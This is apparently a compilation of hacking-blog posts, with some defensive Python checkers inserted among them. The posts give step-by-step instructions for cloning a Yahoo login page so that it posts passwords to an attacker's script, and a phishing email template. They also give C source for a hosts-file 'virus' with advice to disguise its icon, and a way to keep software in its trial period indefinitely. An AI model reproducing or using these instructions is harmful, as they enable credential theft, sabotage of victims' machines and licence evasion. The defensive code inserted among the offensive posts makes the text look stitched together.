RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.


RunAsDate intercepts the kernel API calls that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista.


NOTE: FOLLOW THESE TIPS CAREFULLY


You have to follow these tips carefully to successfully hack a piece of software and make it run in its trial mode forever.


1. Note down the date and time, when you install the software for the first time.


2. Once the trial period expires, you must always run the software using RunAsDate.


3. After the trial period has expired, do not run the software (program) directly. If you run the software directly even once, this hack may no longer work.


4. It is better and safer to inject the date of the last day in the trial period.


For example, if the trial period expires on Jan 30 2009, always inject the date as Jan 29 2009 in RunAsDate.


I hope this helps! Please express your experience and opinions through comments.

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number. Do you think I am crazy? No, I am not...


Just try the following steps and you’ll get a call to your cell phone from your own number.


 


1. Just give a missed call to this number. You’ll not be charged!


+41445804650


2. Wait for a few seconds and you’ll get a call to your cell phone from your own number


3. Receive the call. You’ll hear a lady’s voice asking for a PIN number. Just enter some rubbish number.


4. She says “Your PIN cannot be processed” and the call disconnects.


ANOTHER TRICK


Instead of giving a missed call, just continue calling. The call will not be received and will get disconnected after a while. But now do you know what happens?


You will get a call from the number


+501


Reason behind this trick


God Knows!!


Just try and pass your comments. Tell me whether the second trick worked or not!!

How to Create a Fake Login Page?


In this post I’ll show you how to create a fake login page in simple steps. A fake login page is a page that exactly resembles the original login page of sites like Yahoo, Gmail etc. However, these fake login pages are created just for the purpose of stealing other people’s passwords.


Here in this post I will give a procedure to create a fake login page of Yahoo.com. The same procedure may be followed to create the fake login page of Gmail and other sites.


 


Here is a step-by-step procedure to create a fake login page.


1. Go to the Yahoo login page by typing the following URL.


mail.yahoo.com


 2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)


3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .


4. Make sure that the folder contains the necessary images and other support files. Now rename the folder to “files”. You may also rename the .HTML file to yahoo.HTML


5. Now open the .HTML file using WordPad. Change the links of all the files present in the folder to /files.


For example you may find something like this in the opened HTML file


src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif

Rename the above link into

 

src=”files/ma_mail_1.gif

Repeat the same procedure for every file contained in the Folder.

 

6. Now search for the following term

 

action=

 

you will see something like this

 

action=https://login.yahoo.com/config/login?


Edit this to

 

action=http://yoursite.com/login.php


Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

yoursite.com/


7. Now you have to upload your yahoo.HTML, files folder and login.php to

 


NOTE: Make sure that your host supports PHP


8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)


9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends. When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site. Download the .TXT file to see the password inside.


Hacking an email account using a fake login page is discussed in detail in my new post Hack Yahoo, Gmail or any other Password
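From the defender's side, the one edit a cloned page cannot avoid is the changed `action=` target, so a saved or reported page can be triaged by checking where its password form posts. This is an added example, not part of the original post; the form field names and the allowed-domain set are assumptions, and the two sample pages are constructed from the `action=` values quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed samples: the original form target and the edited one from the post
GENUINE_PAGE = """
<form method="post" action="https://login.yahoo.com/config/login?">
  <input type="text" name="login"><input type="password" name="passwd">
</form>"""
CLONED_PAGE = """
<form method="post" action="http://yoursite.com/login.php">
  <input type="text" name="login"><input type="password" name="passwd">
</form>
<form action="/search"><input type="text" name="q"></form>"""


class _FormCollector(HTMLParser):
    """Collects each <form> action and whether the form holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _host_allowed(host, allowed_domains):
    """True for an allowed domain or a subdomain of it, not for look-alike suffixes."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed_domains)


def audit_login_forms(html, page_url, allowed_domains):
    """Return one finding per password form that posts somewhere unexpected."""
    collector = _FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue  # search boxes and the like are not credential forms
        target = urljoin(page_url, form["action"])  # resolves relative actions
        parts = urlsplit(target)
        reasons = []
        if parts.scheme != "https":
            reasons.append("credentials sent without TLS")
        if not _host_allowed(parts.hostname or "", allowed_domains):
            reasons.append("password posted to a host outside the brand's domains")
        if reasons:
            findings.append({"target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    print(audit_login_forms(GENUINE_PAGE, "https://login.yahoo.com/", {"yahoo.com"}))
    print(audit_login_forms(CLONED_PAGE, "http://yoursite.com/yahoo.HTML", {"yahoo.com"}))
```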

Hack Yahoo, Gmail or any Email Password


Today I will show you how to hack Yahoo, Gmail or any other email password. I have already shown some of the easiest ways to hack Yahoo in my previous post Hacking an email account. So, you may wonder what’s special about this post. Here in this post I will show all of you the real way to hack Yahoo and other passwords. This method to hack passwords is the same as the one used by many professional hackers.


NOTE: THIS TUTORIAL IS MEANT FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANY KIND OF MISUSE.

 


STEPS TO BE CARRIED OUT BEFORE YOU HACK YAHOO 


Let’s see how to hack Yahoo in particular. Before we hack the password, we have to understand how to exploit the major vulnerabilities in Yahoo. During the sign up process, it allows your first name or last name to contain the word Yahoo. Is this not a major flaw? Yes, because you can choose the first name as Yahoo Account and the last name as Update. So, when you send an email from this Yahoo account, it appears to have come from


Yahoo Account Update (Yahoo Accounts Team)


So, this helps us to make the victims believe that this is an email from Yahoo Accounts Team.


So What’s Next?


CREATING A NEW ACCOUNT


Before you hack Yahoo, you need to create a new account as given below


1. Choose the first name as YAHOO ACCOUNT and last name as UPDATE.


2. Select an email ID something like this


update_account@yahoo.com


update08_account@yahoo.com


accountupdate09@yahoo.com  etc.


I think you got the idea.


3. Always select @yahoo.com not yahoo.co.uk or yahoo.co.in.


Now you are all set to hack the password.


USING A FAKE LOGIN PAGE TO HACK YAHOO


We have to hack Yahoo using a fake login page. Hacking Yahoo using a fake login page has a higher success rate than any other method. In fact, this is the real procedure adopted by many hackers to hack an email password.


The step-by-step procedure to create a fake login page is explained in my post How to create a fake login page


After you have set up your new Yahoo account and the fake login page, it’s just a cakewalk to hack the password. All you have to do is just send an email from your fake Yahoo account to the victim’s ID saying that


————————————————————————————


Dear <Victim Name> or Yahoo subscriber,


It is highly recommended that you update your account immediately as per the new policy adopted by Yahoo.Blah blah…


Click Here to update your account.


Thanks,


The Yahoo accounts team


————————————————————————————


Remember to link your fake login page to the text Click Here. Once the victim enters the password in the fake login page, you have successfully hacked the Yahoo password. The above procedure can also be used to hack Gmail and other email passwords.


You can see the DEMO of fake login page that I have created HERE.


Please pass your comments and opinions.
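Because the sending address in this scheme really is an @yahoo.com mailbox, a domain check passes it; what gives the message away is a display name that claims to be the provider's staff. The check below is an added example, not part of the original post: the token lists and the official-sender allowlist are assumptions (the allowlisted address is a placeholder), and the sample headers are constructed from the names used above.

```python
import re
import unicodedata
from email import message_from_string
from email.utils import parseaddr

BRAND_TOKENS = ("yahoo",)
AUTHORITY_TOKENS = ("account", "update", "team", "security", "support", "admin")
# Hypothetical allowlist of addresses the provider really sends notices from
OFFICIAL_SENDERS = {"notices@accounts.provider.example"}


def _squash(text):
    """Fold case and compatibility forms, then drop spacing and punctuation.

    NFKC folds full-width and similar forms; it does not fold look-alike
    letters from other scripts.
    """
    text = unicodedata.normalize("NFKC", text).casefold()
    return re.sub(r"[^a-z0-9]", "", text)


def assess_sender(raw_message):
    """Classify the From header of one RFC 5322 message."""
    msg = message_from_string(raw_message)
    display, address = parseaddr(msg.get("From", ""))
    address = address.lower()
    name = _squash(display)
    brand = any(tok in name for tok in BRAND_TOKENS)
    authority = any(tok in name for tok in AUTHORITY_TOKENS)
    if address in OFFICIAL_SENDERS or not brand:
        verdict = "ok"
    elif authority:
        verdict = "impersonation-suspect"   # brand + staff wording, ordinary mailbox
    else:
        verdict = "brand-in-name"           # worth a softer warning banner
    return {"display": display, "address": address, "verdict": verdict}


def _message(from_header):
    # Constructed message; only the From header matters here
    return (f"From: {from_header}\nTo: user@example.com\n"
            "Subject: Update your account\n\nBody\n")


SAMPLES = {
    "page_example": _message("Yahoo Account Update <update_account@yahoo.com>"),
    "spaced": _message('"Y.a.h.o.o Accounts  Team" <accountupdate09@yahoo.com>'),
    "ordinary": _message("Alice Example <alice@yahoo.com>"),
    "official": _message("Yahoo Account Team <notices@accounts.provider.example>"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, assess_sender(raw))
```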

Denial Of Service Attack


It’s real. On February 6th, 2000, the Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.


What is a Denial Of Service Attack?

 




  • A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.

  • If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.


Types of denial of service attacks


There are several general categories of DoS attacks. Popularly, the attacks are divided into three classes:



  • bandwidth attacks,

  • protocol attacks, and

  • logic attacks



What is Distributed Denial of Service Attack?



  • An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.

  • This makes it difficult to detect because attacks originate from several IP addresses.

  • If a single IP address is attacking a company, it can block that address at its firewall. If there are 30000 addresses, this is extremely difficult.

Trojans and Backdoors

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.



  • It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.

  • Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.


Working of Trojans




 



  • The attacker gets access to the trojaned system as the system goes online.

  • By way of the access provided by the trojan, the attacker can stage attacks of different types.


Various Trojan Types



  • Remote Access Trojans

  • Password Sending Trojans

  • Keyloggers

  • Destructive

  • Denial Of Service (DoS) Attack Trojans

  • Proxy/Wingate Trojans

  • FTP Trojans

  • Software Detection Killers


Modes of Transmission



  • Attachments

  • Physical Access

  • Browser And E-mail Software Bugs

  • NetBIOS (File Sharing)

  • Fake Programs

  • Un-trusted Sites And Freeware Software


Backdoor Countermeasures



  • Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage (e.g. before accessing a floppy, running an exe or downloading mail).

  • An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.

  • Educate your users not to install applications downloaded from the internet and e-mail attachments.

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealth software that sits between the keyboard hardware and the operating system so that it can record every keystroke.


There are two types of keystroke loggers:


1. Software based and

2. Hardware based.


Spyware: Spector (http://www.spector.com/)



  • Spector is spyware that records everything anyone does on the internet.

  • Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

  • Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.


Hacking Tool: eBlaster (http://www.spector.com/)


  • eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

  • eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

  • Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: Hardware Keylogger (http://www.keyghost.com)


  • The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

  • It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.
    Port Scanning

    Port scanning is one of the most popular techniques used by hackers to discover services that can be compromised.



    • A potential target computer runs many ’services’ that listen at ‘well-known’ ‘ports’.

    • By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.

    • Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.


    Port Scanning Techniques




    Port Scanning Techniques can be broadly classified into:



    • Open scan

    • Half-open scan

    • Stealth scan

    • Sweeps

    • Misc


    Commonly used tools for port scanning


    1. Tool: SuperScan 3.0



    2. Tool: NMap (Network Mapper)



    3. Tool: NetScan Tools Pro 2003



    4. Tool: ipEye, IPSecScan


    Proxy Servers and Anonymizers


    A proxy is a network computer that can serve as an intermediary for connections with other computers. Proxies are usually used for the following purposes:

     




    • As firewall, a proxy protects the local network from outside access.

    • As an IP address multiplexer, a proxy allows a number of computers to connect to the Internet through only one IP address.

    • Proxy servers can be used (to some extent) to anonymize web surfing.

    • Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.

    • Proxy servers can afford some protection against hacking attacks.


    Anonymizers



    • Anonymizers are services that help make your own web surfing anonymous.

    • The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.

    • An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.

    Creating a Virus to Block Websites


    Most of us are familiar with the virus that used to block the Orkut and Youtube sites. If you are curious about creating such a virus on your own, then you are in the right place. Today I’ll teach you how to create a simple virus that blocks websites. And as usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.


    This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus needs to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-installs the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any browser program.


    NOTE: You can also block a website manually. But here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?


    Here is the sourcecode of the virus.


    #include<stdio.h>

    #include<dos.h>

    #include<dir.h>


    char site_list[6][30]={

    “google.com”,

    “www.google.com”,

    “youtube.com”,

    “www.youtube.com”,

    “yahoo.com”,

    “www.yahoo.com”

    };

    char ip[12]=”127.0.0.1″;

    FILE *target;


    int find_root(void);

    void block_site(void);


    int find_root()

    {

    int done;

    struct ffblk ffblk;//File block structure


    done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

    /*to determine the root drive*/

    if(done==0)

    {

    target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

    /*to open the file*/

    return 1;

    }


    done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

    /*to determine the root drive*/

    if(done==0)

    {

    target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

    /*to open the file*/

    return 1;

    }


    done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

    /*to determine the root drive*/

    if(done==0)

    {

    target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

    /*to open the file*/

    return 1;

    }


    done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);

    /*to determine the root drive*/

    if(done==0)

    {

    target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);

    /*to open the file*/

    return 1;

    }


    else return 0;

    }


    void block_site()

    {

    int i;

    fseek(target,0,SEEK_END); /*to move to the end of the file*/


    fprintf(target,”\n”);

    for(i=0;i<6;i++)

    fprintf(target,”%s\t%s\n”,ip,site_list[i]);

    fclose(target);

    }


    void main()

    {

    int success=0;

    success=find_root();

    if(success)

    block_site();

    }


    How to Compile ?


    1. Download the source code here. Download the compiled module(virus) here.


    2. Compile the sourcecode using any C/C++ compiler.


    3. To test, run the compiled module. It will block the sites that are listed in the source code.


    4. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing the error “Page cannot be displayed”.


    5. To remove the virus, type the following in the Run dialog.

    %windir%\system32\drivers\etc


    6. There, open the file named “hosts” using Notepad. At the bottom of the opened file you’ll see something like this


    127.0.0.1—————————google.com


    7. Delete all such entries which contain the names of blocked sites.


    NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?
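The manual removal steps above can be automated as a hosts-file audit that reports every public name pointed at a loopback or unspecified address and produces the cleaned file. This is an added example, not part of the original post; the sample file is constructed from the site list in the source code above, and the set of names treated as legitimately local is an assumption.

```python
import ipaddress

# Names that normally do resolve to the local machine (assumed set)
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}

# Constructed sample of a hosts file after the program above has run
SAMPLE_HOSTS = "\n".join([
    "# constructed sample of a Windows hosts file",
    "127.0.0.1       localhost",
    "192.168.1.20    fileserver   # constructed LAN entry",
    "",
    "127.0.0.1\tgoogle.com",
    "127.0.0.1\twww.google.com",
    "127.0.0.1\tyoutube.com",
    "127.0.0.1\twww.youtube.com",
    "127.0.0.1\tyahoo.com",
    "127.0.0.1\twww.yahoo.com",
]) + "\n"


def _is_sinkhole(address_text):
    """True for loopback (127.0.0.0/8, ::1) and unspecified (0.0.0.0, ::)."""
    try:
        address = ipaddress.ip_address(address_text)
    except ValueError:
        return False
    return address.is_loopback or address.is_unspecified


def audit_hosts(text):
    """Return (findings, cleaned_text).

    findings is a list of (line_number, address, hostname) for every non-local
    name mapped to a sinkhole address; cleaned_text is the file without them.
    """
    findings, cleaned = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        body, hash_mark, comment = line.partition("#")
        fields = body.split()
        if len(fields) < 2 or not _is_sinkhole(fields[0]):
            cleaned.append(line)          # comments, blanks, ordinary mappings
            continue
        local = [n for n in fields[1:] if n.lower() in LOCAL_NAMES]
        redirected = [n.lower() for n in fields[1:] if n.lower() not in LOCAL_NAMES]
        findings.extend((lineno, fields[0], n) for n in redirected)
        if not redirected:
            cleaned.append(line)
        elif local:
            # Keep the legitimate names that shared a line with redirected ones
            rebuilt = fields[0] + "\t" + " ".join(local)
            cleaned.append(rebuilt + (" #" + comment if hash_mark else ""))
    return findings, "\n".join(cleaned) + "\n"


if __name__ == "__main__":
    found, fixed = audit_hosts(SAMPLE_HOSTS)
    for lineno, address, name in found:
        print(f"line {lineno}: {name} -> {address}")
    print(fixed, end="")
```

Ad-blocking hosts lists use the same mechanism on purpose, so review the findings before writing the cleaned text back to `%windir%\system32\drivers\etc\hosts`.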

    Common Terminologies used in Internet Security


    If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.


    Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.


    Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.


    IP spoofing – is an attempt to access your system by pretending to be another system. This is done by setting up a system with an IP address that you normally trust.


    Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.


    Trojan horse – is a program that pretends to be useful software, while its actual purpose is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.


    Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.


    Worm – is similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

    Tips to improve Email Privacy


    Many websites ask for your email address when you shop online, download free software etc. But do you know that this has a chance of affecting your email privacy through spam emails?


    Though most websites don’t use spamming as an email marketing strategy, there are a few that send junk emails and don’t care about anti-spam laws. Here are some tips to protect your email privacy from such threats.

    Before submitting your email address you need to check the reputation of the company. Reputed websites would normally follow the right email practices to ensure your email privacy. Such companies will never want to lose their hard earned reputation by getting blamed for spamming.


    See whether the website provides an email privacy statement. You need to go through this statement in detail, and know about the kind of emails that will be sent to you, how often etc. Based on this you can decide whether you need such emails. You don’t want to give your email address to some fraud company that is thinking about handing over your email address to hundreds of other websites.


    Finally, check whether the website really respects your privacy. Often you will find some text like “I agree to receive email” that comes with a check box. You can agree to receive emails by checking the check box. If the check box is already checked, it is a good indication that the website doesn’t respect your privacy. So watch out!

    Common Email Hacking methods


    Gone are the days when email hacking was a sophisticated art. Today anybody can access hacking tips through the Internet and start hacking your Yahoo or Hotmail account. All that is needed is doing a search on Google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but has more to do with raising awareness of some common email hacking methods.


    Hackers can install key logger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details. Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).


    Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the webpages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk. A detailed email hacking tutorial is discussed in the post Hacking an email account.


    Before leaving you should definitely consider reading my latest post Hacking Yahoo, Gmail or any other Password which covers the real ways of professional hacking.

    How to Download Videos from Youtube


    Here is the easiest way to download videos from Youtube and convert them into other formats. Most sites give you some confusing way to download videos from Youtube, but here is an easy way. Here is a step-by-step guide to download videos from Youtube.


    STEP-1. DOWNLOADING THE VIDEO FROM YOUTUBE


    Basically the video that you want to download from Youtube will be in the .flv format. So first, when you download videos from Youtube, they will be saved in .flv format.


    Once you get the video URL, you can use any one of the following sites/plugins to download Youtube videos.



    • Download Youtube Videos - Download Youtube Videos is one of the most widely used sites to download videos from Youtube in the .flv format. Here you’ll see a box to enter the download URL. Just enter the URL here and click on download to save the video.

    • KissYouTube - KissYouTube offers an easy way to download videos from Youtube. Just visit the site and you’ll find a box to enter the video URL. In this box enter the URL of the video you want to download and click on GO. Next you will see a Download button. Click on the download button and save the Youtube video with the extension .flv.

    • Download Helper - Download Helper is an excellent Firefox plugin to download videos from Youtube.

    • My Video Downloader - MyVideo Downloader will download and convert videos from many sites, not just YouTube.


     


    STEP-2. CONVERTING THE YOUTUBE VIDEO FROM .FLV TO OTHER FORMATS


    Once you download the video, you can use any of the freely available/commercial video conversion software. But here in this tutorial I prefer OJOsoft Total Video Converter to convert the downloaded Youtube video. The speciality of this video converter is that it supports almost all the formats. Once you convert the downloaded Youtube video to MPEG format you’ll be able to play it with Windows Media Player.